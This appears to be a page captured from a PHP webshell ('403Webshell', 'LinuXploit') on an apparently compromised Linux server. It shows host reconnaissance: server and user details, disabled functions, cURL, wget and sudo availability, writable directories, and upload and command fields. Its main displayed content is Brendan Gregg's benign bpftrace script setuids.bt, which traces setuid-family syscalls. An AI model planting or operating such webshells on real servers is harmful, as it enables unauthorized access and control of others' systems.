403Webshell
Server IP : 172.67.206.42  /  Your IP : 104.23.197.33
Web Server : Apache
System : Linux server.localhost.com 6.8.0-85-generic #85-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep 18 15:26:59 UTC 2025 x86_64
User : pahana ( 1029)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /proc/thread-self/root/usr/sbin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /proc/thread-self/root/usr/sbin/setuids.bt
#!/usr/bin/env bpftrace
/*
 * setuids - Trace the setuid syscalls: privilege escalation.
 *
 * See BPF Performance Tools, Chapter 11, for an explanation of this tool.
 *
 * Copyright (c) 2019 Brendan Gregg.
 * Licensed under the Apache License, Version 2.0 (the "License").
 * This was originally created for the BPF Performance Tools book
 * published by Addison Wesley. ISBN-13: 9780136554820
 * When copying or porting, include this comment.
 *
 * 26-Feb-2019  Brendan Gregg   Created this.
 */

BEGIN
{
	printf("Tracing setuid(2) family syscalls. Hit Ctrl-C to end.\n");
	printf("%-8s %-6s %-16s %-6s %-9s %s\n", "TIME",
	    "PID", "COMM", "UID", "SYSCALL", "ARGS (RET)");
}

tracepoint:syscalls:sys_enter_setuid,
tracepoint:syscalls:sys_enter_setfsuid
{
	@uid[tid] = uid;
	@setuid[tid] = args.uid;
	@seen[tid] = 1;
}

tracepoint:syscalls:sys_enter_setresuid
{
	@uid[tid] = uid;
	@ruid[tid] = args.ruid;
	@euid[tid] = args.euid;
	@suid[tid] = args.suid;
	@seen[tid] = 1;
}

tracepoint:syscalls:sys_exit_setuid
/@seen[tid]/
{
	time("%H:%M:%S ");
	printf("%-6d %-16s %-6d setuid    uid=%d (%d)\n", pid, comm,
	    @uid[tid], @setuid[tid], args.ret);
	delete(@seen[tid]); delete(@uid[tid]); delete(@setuid[tid]);
}

tracepoint:syscalls:sys_exit_setfsuid
/@seen[tid]/
{
	time("%H:%M:%S ");
	printf("%-6d %-16s %-6d setfsuid  uid=%d (prevuid=%d)\n", pid, comm,
	    @uid[tid], @setuid[tid], args.ret);
	delete(@seen[tid]); delete(@uid[tid]); delete(@setuid[tid]);
}

tracepoint:syscalls:sys_exit_setresuid
/@seen[tid]/
{
	time("%H:%M:%S ");
	printf("%-6d %-16s %-6d setresuid ", pid, comm, @uid[tid]);
	printf("ruid=%d euid=%d suid=%d (%d)\n", @ruid[tid], @euid[tid],
	    @suid[tid], args.ret);
	delete(@seen[tid]); delete(@uid[tid]); delete(@ruid[tid]);
	delete(@euid[tid]); delete(@suid[tid]);
}

Youez - 2016 - github.com/yon3zu
LinuXploit